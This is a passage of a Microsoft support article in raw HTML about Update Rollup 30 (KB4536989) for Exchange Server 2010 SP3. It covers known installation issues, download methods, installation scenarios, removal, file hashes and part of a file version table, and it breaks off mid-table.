crashes in Exchange Server 2013 and Exchange Server 2010</p><h2>Known issues in this security update</h2><ul><li><p>When you try to manually install this security update by double-clicking the update file (.msp) to run it in \"Normal mode\" (that is, not as an administrator), some files are not correctly updated.</p><p>When this issue occurs, you don\u2019t receive an error message or any indication that the security update was not correctly installed. However, Outlook Web Access (OWA) and the Exchange Control Panel (ECP) may stop working. This issue occurs on servers that are using user account control (UAC). The issue occurs because the security update doesn\u2019t correctly stop certain Exchange-related services.</p><p>To avoid this issue, follow these steps to manually install this security update:</p><ol><li>Select <strong>Start</strong>, and type\u00a0<strong>cmd</strong>.</li><li>In the results, right-click <strong>Command Prompt</strong>, and then select <strong>Run as administrator</strong>.</li><li>If the <strong>User Account Control</strong> dialog box appears, verify that the default action is the action that you want, and then select <strong>Continue</strong>.</li><li>Type the full path of the .msp file, and then press Enter.</li></ol><p>This issue does not occur when you install the update through Microsoft Update.</p></li><li><p>Exchange services may remain in a disabled state after you install this security update. This condition does not indicate that the update is not installed correctly. This condition may occur if the service control scripts experience a problem when they try to return Exchange services to its usual state. To fix this issue, use Services Manager to restore the startup type to <strong>Automatic</strong>, and then start the affected Exchange services manually. To avoid this issue, run the security update at an elevated command prompt. 
For more information about how to open an elevated Command Prompt window, see\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/cc947813(v=ws.10).aspx\" managed-link=\"\" target=\"_blank\">Start a Command Prompt as an Administrator</a>.</p></li></ul><h2>How to get and install the update</h2><h3>Method 1: Microsoft Update</h3><p>This update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see\u00a0<a aria-live=\"rude\" bookmark-id=\"\" data-bi-name=\"content-anchor-link\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/help/12373/windows-update-faq\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">Windows Update: FAQ</a>.</p><h3>Method 2: Microsoft Update Catalog</h3><p>To get the standalone package for this update, go to the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/Search.aspx?q=KB4536989\" managed-link=\"\" target=\"_blank\">Microsoft Update Catalog</a>\u00a0website.</p><h3>Method 3: Microsoft Download Center</h3><p>You can get the standalone update package through the Microsoft Download Center.</p><ul linespacing=\"1\" style=\"list-style-type:UnorderedBullets\" type=\"UnorderedBullets\"><li><span asset=\"4009805\" contenteditable=\"false\" props='{\"size\":\"full\"}' unselectable=\"on\">4009805</span><a data-content-id=\"\" data-content-type=\"\" href=\"http://www.microsoft.com/download/details.aspx?FamilyID=4d072d3e-153e-4a5a-859e-ad054fe24107\" managed-link=\"\" target=\"_blank\">Download Update Rollup 30 for Exchange Server 2010 SP3 (KB4536989)</a></li></ul><h2>Update detail information for Exchange Server 2010 SP3</h2><h3>Installation instructions for\u00a0Exchange Server 2010 SP3</h3><p>Learn more about <a data-content-id=\"\" data-content-type=\"\" 
href=\"http://technet.microsoft.com/library/ff637981.aspx\" id=\"kb-link-6\" managed-link=\"\" target=\"_blank\">how to install the latest update rollup for Exchange Server 2010</a>.</p><p>Also, learn about the following update installation scenarios.</p><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Install the update on computers that aren't connected to the internet</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><div class=\"kb-collapsible kb-collapsible-collapsed\">When you install this update rollup on a computer that isn't connected to the internet, you may experience a long installation time. Additionally, you may receive the following message:</div><div class=\"sbody-error\">Creating Native images for .Net assemblies.</div><div class=\"kb-collapsible kb-collapsible-collapsed\">This issue is caused by network requests to connect to the following website:<br/>\u00a0</div><div class=\"kb-collapsible kb-collapsible-collapsed\"><a data-content-id=\"\" data-content-type=\"\" href=\"http://crl.microsoft.com/pki/crl/products/codesigpca.crl\" target=\"_blank\">http://crl.microsoft.com/pki/crl/products/CodeSigPCA.crl</a><br/><br/>These network requests are attempts to access the certificate revocation list for each assembly that native image generation (NGen) compiles to native code. 
However, because the server that's running Exchange Server isn't connected to the internet, each request must wait to time out before the process can continue.<br/><br/>To fix this issue, follow these steps:<br/>\u00a0</div><ol><li><div class=\"kb-collapsible kb-collapsible-collapsed\">In Internet Explorer, select <strong class=\"uiterm\">Internet Options</strong>\u00a0on the <strong class=\"uiterm\">Tools</strong> menu, and then select <strong class=\"uiterm\">Advanced</strong>.</div></li><li><div class=\"kb-collapsible kb-collapsible-collapsed\">In the <strong class=\"uiterm\">Security</strong> section, clear the <strong class=\"uiterm\">Check for publisher's certificate revocation</strong> check box, and then select <strong class=\"uiterm\">OK</strong>.<br/><br/><strong>Note</strong> Clear this security option only if the computer is in a tightly-controlled environment.\u00a0\u00a0</div></li><li>When the Setup process is finished, select the <strong>Check for publisher's certificate revocation</strong> check box again.</li></ol></div></div><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Install the update on computers that have customized Outlook Web App files</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><p><strong>Important </strong>Before you apply this update rollup, make a backup copy of any <a data-content-id=\"\" data-content-type=\"\" href=\"http://technet.microsoft.com/library/ee633483(exchg.140).aspx\" id=\"kb-link-8\" managed-link=\"\" target=\"_blank\">customized Outlook Web App</a>\u00a0files.<br/><br/>When you apply an update rollup package, the update process updates the Outlook Web App files, if this is\u00a0required. 
Therefore, any customizations to the Logon.aspx file or to other Outlook Web App files are overwritten, and you must re-create the Outlook Web App customizations in Logon.aspx.</p></div></div><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Install the update for CAS Proxy Deployment Guidance customers who deploy CAS-CAS proxying</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><p><span>If your scenario\u00a0meets both the following conditions, apply the update rollup on the internet-facing Client Access servers (CAS) before you apply the update rollup on the non\u2013internet-facing CAS:</span></p><div class=\"kb-collapsible kb-collapsible-collapsed\"><ul class=\"sbody-free_list\"><li>You're a CAS Proxy Deployment Guidance customer.</li><li>You have deployed <a data-content-id=\"\" data-content-type=\"\" href=\"http://technet.microsoft.com/library/bb310763(exchg.140).aspx\" id=\"kb-link-9\" managed-link=\"\" target=\"_blank\">CAS-CAS proxying</a>.</li></ul><p><strong>Note </strong>For other Exchange Server 2010 configurations, you don't have to apply the update rollup on your servers in any particular order.</p></div></div></div><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Install this update on a DBCS version of Windows Server 2012</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><p>You can't install or uninstall Update Rollup 30 for Exchange Server 2010 SP3 on a double-byte character set (DBCS) version of Windows Server 2012 if the language preference for non-Unicode programs is set to the 
default language. To work around this issue, you must first change this setting. To do this, follow these steps:</p><ol><li>In Control Panel, select\u00a0<strong>Clock, Region and Language</strong>, select\u00a0<strong>Region</strong>, and then select\u00a0<strong>Administrative</strong>.</li><li>In the\u00a0<strong>Language for non-Unicode programs</strong>\u00a0area, select\u00a0<strong>Change system locale</strong>.</li><li>In the\u00a0<strong>Current system locale</strong>\u00a0list, select\u00a0<strong>English (United States)</strong>, and then select\u00a0<strong>OK</strong>.</li></ol><p>After you successfully install or uninstall Update Rollup 30, revert this language setting, as appropriate.</p></div></div></div><h3 class=\"sbody-h3\">Restart requirement</h3><p>The required services are restarted automatically after\u00a0you apply this update rollup.</p><h3 class=\"sbody-h3\">Removal information</h3><p>To remove Update Rollup 30 for Exchange Server 2010 SP3, use the\u00a0<strong class=\"uiterm\">Add or Remove Programs</strong>\u00a0item in Control Panel to remove update <strong>KB4536989</strong>.</p><h2>More information</h2><h3>Security update deployment information</h3><p>For deployment information about this update, see\u00a0<a aria-live=\"rude\" data-bi-name=\"content-anchor-link\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/help/20200211\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">security update deployment information: February 11, 2020</a>.\u00a0</p><h3>Security update replacement information</h3><p>This security update replaces the following previously released update:</p><ul><li><a data-content-id=\"4509410\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">Description of the security update for Microsoft Exchange Server 2010: July 9, 2019</a></li></ul><h2>File information</h2><h3>File hash information</h3><table class=\"table\"><tbody><tr><th>Update name</th><th>File 
name</th><th>SHA1 hash</th><th>SHA256 hash</th></tr><tr><td>Update Rollup 30 for Exchange Server 2010</td><td>Exchange2010-KB4536989-x64-en.msp</td><td>2DD3EB1C737743941FB56293BB9A68242F0F52E2</td><td>95B0704B6F7841883C8999F5809A84FD0EBAD9E99F339DA18C47AA63F82963C4</td></tr></tbody></table><h3>Exchange Server file information</h3><p>The English (United States) version of this update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.</p><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\">Update Rollup 30 for Exchange Server 2010</span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><table class=\"table\"><tbody><tr><th>File name</th><th>File version</th><th>File size</th><th>Date</th><th>Time</th><th>Platform</th></tr><tr><td>A33e7066a3f143ef8386e08c4458051d_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Abv_dg.dll</td><td>14.3.470.0</td><td>898,992</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Addreplicatopfrecursive.ps1</td><td>Not applicable</td><td>13,837</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Addressbook.aspx</td><td>Not applicable</td><td>3,830</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Adduserstopfrecursive.ps1</td><td>Not applicable</td><td>13,465</td><td>03-Jan-2020</td><td>05:47</td><td>Not 
applicable</td></tr><tr><td>Af46d2bd14db43e0b49619bd0eeb07ec_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Aggregatepfdata.ps1</td><td>Not applicable</td><td>17,393</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Airfilter.dll</td><td>14.3.470.0</td><td>49,584</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Airsynctistateparser.dll</td><td>14.3.470.0</td><td>83,376</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Ajaxcontroltoolkit.dll</td><td>14.3.470.0</td><td>110,280</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Alsperf.dll1</td><td>14.3.470.0</td><td>27,568</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Antispamcommon.ps1</td><td>Not applicable</td><td>11,413</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Asdat.msi</td><td>Not applicable</td><td>5,083,136</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Asentirs.msi</td><td>Not applicable</td><td>73,728</td><td>03-Jan-2020</td><td>05:50</td><td>Not applicable</td></tr><tr><td>Asentsig.msi</td><td>Not applicable</td><td>73,728</td><td>03-Jan-2020</td><td>05:50</td><td>Not applicable</td></tr><tr><td>Attachfiledialog.aspx</td><td>Not applicable</td><td>5,346</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Autodisc_web.config</td><td>Not applicable</td><td>89,637</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicaddressbook.aspx</td><td>Not applicable</td><td>4,217</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicattachmentmanager.aspx</td><td>Not applicable</td><td>3,826</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicautosaveinfo.aspx</td><td>Not applicable</td><td>4,255</td><td>03-Jan-2020</td><td>05:49</td><td>Not 
applicable</td></tr><tr><td>Basiccalendaritemschedulingtab.aspx</td><td>Not applicable</td><td>6,908</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basiccalendarview.aspx</td><td>Not applicable</td><td>3,259</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basiccontactview.aspx</td><td>Not applicable</td><td>3,586</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basiccontactviewwebpart.aspx</td><td>Not applicable</td><td>2,485</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basiceditcalendaritem.aspx</td><td>Not applicable</td><td>17,517</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basiceditcontact.aspx</td><td>Not applicable</td><td>6,356</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basiceditmeetingresponse.aspx</td><td>Not applicable</td><td>11,664</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basiceditmessage.aspx</td><td>Not applicable</td><td>8,801</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basiceditrecurrence.aspx</td><td>Not applicable</td><td>14,645</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicfoldermanagement.aspx</td><td>Not applicable</td><td>3,630</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicmeetingpage.aspx</td><td>Not applicable</td><td>12,659</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicmessageview.aspx</td><td>Not applicable</td><td>4,084</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicmessageviewwebpart.aspx</td><td>Not applicable</td><td>2,625</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicmoveitem.aspx</td><td>Not applicable</td><td>4,112</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicoptions.aspx</td><td>Not 
applicable</td><td>3,506</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr>
<tr><td>Microsoft.exchange.data.applicationlogic.dll</td><td>14.3.487.0</td><td>429,776</td>
<td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.applicationlogic.eventlog.dll</td><td>14.3.470.0</td><td>21,424</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.data.directory.dll</td><td>14.3.470.0</td><td>3,469,144</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.directory.eventlog.dll</td><td>14.3.470.0</td><td>83,888</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.data.dll</td><td>14.3.470.0</td><td>921,432</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.filedistributionservice.eventlog.dll</td><td>14.3.470.0</td><td>28,592</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.data.mapi.dll</td><td>14.3.487.0</td><td>220,880</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.providers.dll</td><td>14.3.487.0</td><td>184,016</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.storage.clientstrings.dll</td><td>14.3.470.0</td><td>98,136</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.storage.dll</td><td>14.3.487.0</td><td>5,287,632</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.storage.eventlog.dll</td><td>14.3.470.0</td><td>28,592</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.data.throttlingservice.client.dll</td><td>14.3.470.0</td><td>52,936</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.throttlingservice.client.eventlog.dll</td><td>14.3.470.0</td><td>19,888</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.data.throttlingservice.eventlog.dll</td><td>14.3.470.0</td><td>19,888</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.datacenterstrings.dll</td><td>14.3.470.0</td><td>81,
544</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.dll</td><td>14.3.470.0</td><td>827,080</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.edgecredentialsvc.exe</td><td>14.3.470.0</td><td>28,288</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.edgesync.common.dll</td><td>14.3.470.0</td><td>167,768</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.edgesync.datacenterproviders.dll</td><td>14.3.470.0</td><td>233,312</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.edgesync.eventlog.dll</td><td>14.3.470.0</td><td>29,616</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.edgesyncsvc.exe</td><td>14.3.470.0</td><td>114,528</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.exchangecertificate.eventlog.dll</td><td>14.3.470.0</td><td>18,864</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>Microsoft.exchange.exchangecertificateservicelet.dll</td><td>14.3.470.0</td><td>52,872</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.extensibility.eventlog.dll</td><td>14.3.470.0</td><td>20,400</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.extensibility.internal.dll</td><td>14.3.470.0</td><td>446,304</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.groupmetrics.eventlog.dll</td><td>14.3.470.0</td><td>18,864</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>Microsoft.exchange.groupmetricsservicelet.dll</td><td>14.3.470.0</td><td>28,296</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.hathirdpartyreplication.dll</td><td>14.3.470.0</td><td>61,128</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.helpprovider.dll</td><td>14.3.470.0</td><td>52,872</td><td>03-Jan-2020
</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.imap4.eventlog.dll</td><td>14.3.470.0</td><td>23,984</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.imap4.exe</td><td>14.3.487.0</td><td>225,192</td><td>03-Jan-2020</td><td>05:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.imap4service.exe</td><td>14.3.487.0</td><td>28,880</td><td>03-Jan-2020</td><td>05:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.infoworker.assistantsclientresources.dll</td><td>14.3.470.0</td><td>53,088</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.infoworker.common.dll</td><td>14.3.487.0</td><td>1,470,160</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.infoworker.common.mailtips.groupmetricsreaderinterop.dll</td><td>14.3.470.0</td><td>23,904</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.infoworker.eventlog.dll</td><td>14.3.470.0</td><td>58,800</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.infoworker.meetingvalidator.dll</td><td>14.3.487.0</td><td>131,008</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.instantmessaging.dll</td><td>14.3.470.0</td><td>69,320</td><td>03-Jan-2020</td><td>05:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.irm.formprotector.dll</td><td>14.3.470.0</td><td>159,144</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.irm.msoprotector.dll</td><td>14.3.470.0</td><td>59,312</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.irm.ofcprotector.dll</td><td>14.3.470.0</td><td>53,680</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.isam.esebcli.dll</td><td>14.3.470.0</td><td>95,576</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.isam.interop.dll</td><td>14.3.470.0</td><td>363,352</td><td>03-Jan-2020</td><td>05:46</td><td>x64</
td></tr><tr><td>Microsoft.exchange.live.domainservices.dll</td><td>14.3.470.0</td><td>135,000</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.common.dll</td><td>14.3.487.0</td><td>577,232</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.dll</td><td>14.3.487.0</td><td>364,240</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.eventlog.dll</td><td>14.3.470.0</td><td>30,640</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.provider.dll</td><td>14.3.487.0</td><td>179,920</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.proxyclient.dll</td><td>14.3.487.0</td><td>126,672</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.proxyservice.dll</td><td>14.3.487.0</td><td>122,576</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailsubmission.eventlog.dll</td><td>14.3.470.0</td><td>22,448</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.management.controlpanel.dll</td><td>14.3.496.0</td><td>3,650,440</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.controlpanelmsg.dll</td><td>14.3.470.0</td><td>34,736</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.management.detailstemplates.dll</td><td>14.3.470.0</td><td>89,800</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.dll</td><td>14.3.487.0</td><td>12,291,792</td><td>03-Jan-2020</td><td>05:45</td><td>x64</td></tr><tr><td>Microsoft.exchange.management.edge.systemmanager.dll</td><td>14.3.470.0</td><td>77,512</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.nativeresou
rces.dll</td><td>14.3.470.0</td><td>208,328</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>Microsoft.exchange.management.powershell.support.dll</td><td>14.3.487.0</td><td>110,288</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.publicfolders.dll</td><td>14.3.470.0</td><td>151,240</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.snapin.esm.dll</td><td>14.3.487.0</td><td>2,563,792</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.systemmanager.dll</td><td>14.3.470.0</td><td>1,281,736</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.managementgui.dll</td><td>14.3.470.0</td><td>5,418,696</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.managementmsg.dll</td><td>14.3.470.0</td><td>33,712</td><td>03-Jan-2020</td><td>05:45</td><td>x64</td></tr><tr><td>Microsoft.exchange.messagesecurity.dll</td><td>14.3.470.0</td><td>93,832</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagesecurity.messagesecuritymsg.dll</td><td>14.3.470.0</td><td>23,472</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.messagingpolicies.edgeagents.dll</td><td>14.3.470.0</td><td>81,544</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.eventlog.dll</td><td>14.3.470.0</td><td>27,568</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.messagingpolicies.journalagent.dll</td><td>14.3.487.0</td><td>114,600</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.redirectionagent.dll</td><td>14.3.487.0</td><td>31,960</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.rmsvcagent.dll</td><td>14.3.487.0</td><td>138,960</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td><
/tr><tr><td>Microsoft.exchange.messagingpolicies.rules.dll</td><td>14.3.487.0</td><td>179,920</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.transportruleagent.dll</td><td>14.3.487.0</td><td>32,976</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.mobiledriver.dll</td><td>14.3.487.0</td><td>155,344</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.monitoring.eventlog.dll</td><td>14.3.470.0</td><td>18,864</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.monitoring.exe</td><td>14.3.487.0</td><td>73,424</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.net.dll</td><td>14.3.470.0</td><td>2,186,952</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.oabauthmodule.dll</td><td>14.3.470.0</td><td>25,736</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.oabmaintenance.eventlog.dll</td><td>14.3.470.0</td><td>20,912</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>Microsoft.exchange.oabmaintenanceservicelet.dll</td><td>14.3.470.0</td><td>56,968</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.pop3.eventlog.dll</td><td>14.3.470.0</td><td>22,984</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.pop3.exe</td><td>14.3.487.0</td><td>98,000</td><td>03-Jan-2020</td><td>05:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.pop3service.exe</td><td>14.3.487.0</td><td>28,880</td><td>03-Jan-2020</td><td>05:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.popimap.core.dll</td><td>14.3.487.0</td><td>159,440</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.powershell.configuration.dll</td><td>14.3.487.0</td><td>200,400</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>Microsoft.exchange.powershell.rbachostingtools.dll</td><td>1
